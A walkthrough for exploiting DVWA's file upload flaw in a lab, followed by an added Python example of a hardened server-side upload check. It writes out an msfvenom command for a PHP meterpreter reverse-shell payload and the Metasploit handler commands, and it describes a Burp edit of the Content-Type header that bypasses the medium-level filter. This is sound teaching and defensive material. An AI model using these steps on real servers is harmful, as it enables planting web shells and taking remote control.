File Upload
Walkthrough on DVWA
LOW + MEDIUM Difficulty
A file upload vulnerability is a weakness in a web application
that allows an attacker to upload malicious files to the server.
These files can then be executed on the server, potentially giving
the attacker unauthorized access to sensitive information, the
ability to execute arbitrary code, and the ability to launch further
attacks. The vulnerability typically arises when the application
does not properly validate or sanitize the file being uploaded,
allowing the attacker to upload a file with a malicious payload.
You should be on Kali Linux or Parrot OS, either in VMware or
VirtualBox or running natively on your PC.
Low-difficulty DVWA File Upload
Step 1
Go to DVWA security settings and set the difficulty to low.
Step 2
Create an msfvenom payload on your Kali machine:
msfvenom -p php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw > exploit.php
Step 3
Now run Metasploit and start a multi-handler to listen for PHP
reverse sessions.
> use exploit/multi/handler
> set payload php/meterpreter/reverse_tcp
Step 4
Now upload the file. It is uploaded without any restriction.
Then open it in the browser.
Step 5
On opening the file, we will get the reverse shell.
Medium-difficulty DVWA File Upload
Step 1
Go to DVWA security settings and set the difficulty to medium.
Step 2
Create an msfvenom payload on your Kali machine:
msfvenom -p php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw > exploit.php
Step 3
Now run Metasploit and start a multi-handler to listen for PHP
reverse sessions.
> use exploit/multi/handler
> set payload php/meterpreter/reverse_tcp
Step 4
Now upload the file. The file will not be uploaded. At Medium
difficulty, the server checks the file's content type and, if it
is not a JPEG image, does not upload it.
Step 5
Start Burp, try to upload the same shell generated in the
previous step, and capture the request in Burp. Now send it to
Repeater and change the content type from application/x-php
to image/jpeg.
Step 6
Now upload the shell and browse to the uploaded file. We will
get the reverse shell.
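Why the Medium check fails, and what a server-side check looks like instead. This is an added example, not DVWA's code and not part of the original walkthrough: weak_check models the content-type test as Step 4 describes it, and hardened_check is one possible replacement. The function names, the allowlist, the no-extra-dots rule and the sample bodies are assumptions constructed for illustration.

```python
import os
import secrets

# Leading bytes of the only formats this example accepts (assumed allowlist).
MAGIC = {".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff", ".png": b"\x89PNG\r\n\x1a\n"}

# Constructed sample bodies: a harmless PHP placeholder and a minimal JPEG header.
PHP_BODY = b"<?php /* constructed placeholder */ ?>"
JPEG_BODY = b"\xff\xd8\xff\xe0" + b"\x00" * 16


def weak_check(filename, declared_type, data):
    """Medium-style check as the walkthrough describes it: only the
    Content-Type value supplied by the client is inspected."""
    return declared_type == "image/jpeg"


def hardened_check(filename, declared_type, data):
    """Ignore the declared type; decide from the name and the bytes.
    Returns a server-chosen storage name, or None to reject."""
    base = os.path.basename(filename.replace("\\", "/"))
    root, ext = os.path.splitext(base.lower())
    if ext not in MAGIC:              # extension allowlist
        return None
    if "." in root:                   # assumed rule: no double extensions
        return None
    if not data.startswith(MAGIC[ext]):  # content must match the extension
        return None
    # Never reuse the client's name: store under a random one.
    return secrets.token_hex(16) + ext


def compare():
    """Run both checks over constructed uploads; rows are (name, weak, hardened)."""
    uploads = [
        ("exploit.php", "application/x-php", PHP_BODY),
        ("exploit.php", "image/jpeg", PHP_BODY),  # Content-Type edited in transit
        ("shell.php.jpg", "image/jpeg", JPEG_BODY),
        ("photo.jpg", "image/jpeg", JPEG_BODY),
    ]
    return [(n, weak_check(n, t, d), hardened_check(n, t, d) is not None)
            for n, t, d in uploads]


if __name__ == "__main__":
    for row in compare():
        print(row)
```

A magic-byte test does not detect script text appended to a valid image, so the upload directory should also be served with script execution disabled.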